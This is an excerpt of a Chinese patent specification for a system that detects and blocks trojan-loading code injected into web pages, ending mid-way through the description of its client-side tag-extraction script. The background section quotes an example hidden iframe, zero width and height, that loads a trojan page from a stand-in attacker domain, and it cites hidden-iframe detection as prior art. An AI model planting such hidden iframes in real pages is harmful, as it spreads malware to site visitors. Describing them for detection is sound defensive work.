[发明专利]一种网页挂马检测和防护方法、系统及相应代码提取方法

说明书

技术领域

本发明涉及网络安全领域，具体涉及一种网页挂马检测和防护方法，一种提取与网页挂马相关的标签的代码的方法，及一种网页挂码检测系统。

背景技术

网页挂马是恶意软件传播最重要的手段。

经过近二十年的发展，当前互联网规模已经非常庞大，特别是作为互联网主要业务之一的Web业务更是得到了极速发展，给人们获取信息带来了极大便利。与此同时，那些为人们提供Web业务的Web网站的安全状况堪忧，最常见的安全问题是Web网站网页被黑客挂马。目前，90％以上的木马和病毒都是利用挂马网页传播的。早期的网页挂马是在Web网页中直接嵌入框架网页(IFRAME)或者对象(Object)实现的，比如，黑客在受害者网站www.abc.com首页面中直接嵌入下面的代码：

<iframe src＝”http://www.hackers.com/Trojan.html”width＝0 height＝0/>

其中，iframe为标签名，src＝”http://www.hackers.com/Trojan.html”width＝0height＝0为标签属性。

上述HTML代码中的统一资源定位符(URL，Uniform/UniversalResource Locator)：http://www.hackers.com/Trojan.html所指向的网页就是一个想通过受害者网站www.abc.com传播的网页木马。如图1所示，当作为受害者的Web客户端发送请求给被挂马的Web网站www.abc.com，得到www.abc.com网站首页面并打开时，会去请求木马所在Web网站www.hackers.com的网页木马Trojan.html，Trojan.html将被自动加载在客户端上，并在用户没有知觉的情况下实现对该客户端的漏洞攻击和木马安装。

这些被挂马的网站既是黑客攻击的受害者，客观上也充当了黑客传播木马的“帮凶”。一旦一个网站被黑客挂马，将对该网站的声誉造成非常不好的影响，因此，网站管理员都在寻求一种能够自动检测其网站各Web页面中是否存在网页挂马脚本的方法。从上面所述的Web网页挂马例子看出，通常情况下，被挂马Web网页和网页木马并不在同一个Web网站上。绝大多数情况下，黑客只是在被挂马的Web页面中塞入少量几行HTML代码，这些HTML代码并不具有传统文件病毒所具有的病毒特征，因此无法采用传统病毒查杀方法对被保护Web网站的所有Web页面进行病毒扫描来发现网页中隐藏的网页挂马。

现有的网页挂马检测方法有以下几种：

1)基于传播手段的检测方法，如发现有<iframe src＝””width＝0 height＝0>这样的代码，就把其作为网页挂马，但此种方法过于武断。

2)基于沙箱的检测方法，该方法就是让每个页面真正运行起来，这是目前最为流行的一种方法。但该方法对环境依赖过高，从而造成漏报相当严重的现象。

有很大部分的Web页面的内容在传输过程中是加密的，这对于从拦截到的Web页面中提取出与网页挂马相关的标签的代码有相当大的限制，系统难以提取出解密的所述标签的代码，进而有效地进行网页挂码检测。

综上，现有技术的网页挂马检测方法还有待改进。此外，现有技术中还存在网页挂码检测过于频繁或实时性不够，管理员对于网页挂码检测及其结果缺乏有效的控制手段等问题。

发明内容

本发明的一个目的是提供一种提取Web页面中与网页挂马相关的标签的代码的方法，以解决因网页加密难以提取标签代码的问题。

为了解决上述技术问题，本发明提供了一种提取Web页面中与网页挂马相关的标签的代码的方法，包括：

网络安全防护系统将一段用于自动提取标签的脚本代码注入拦截到的Web页面，然后将该Web页面发送到客户端；

客户端打开该Web页面时自动运行所述脚本代码，从该Web页面中提取出与网页挂马相关的标签的代码，并将所述标签的代码和该Web页面本身的URL发送到所述网络安全防护系统，其中，所述标签的代码中包含统一资源定位符(URL)；

网络安全防护系统接收和保存客户端发送所述标签的代码。

较佳地，

所述脚本代码包括启动提取代码和标签提取代码，其中：

所述标签提取代码包括主函数，所述主函数被执行后，从注入的Web页面中提取出与网页挂马相关的包含URL的标签代码，将所述标签代码和该Web页面本身的URL一起发送到所述网络安全防护系统；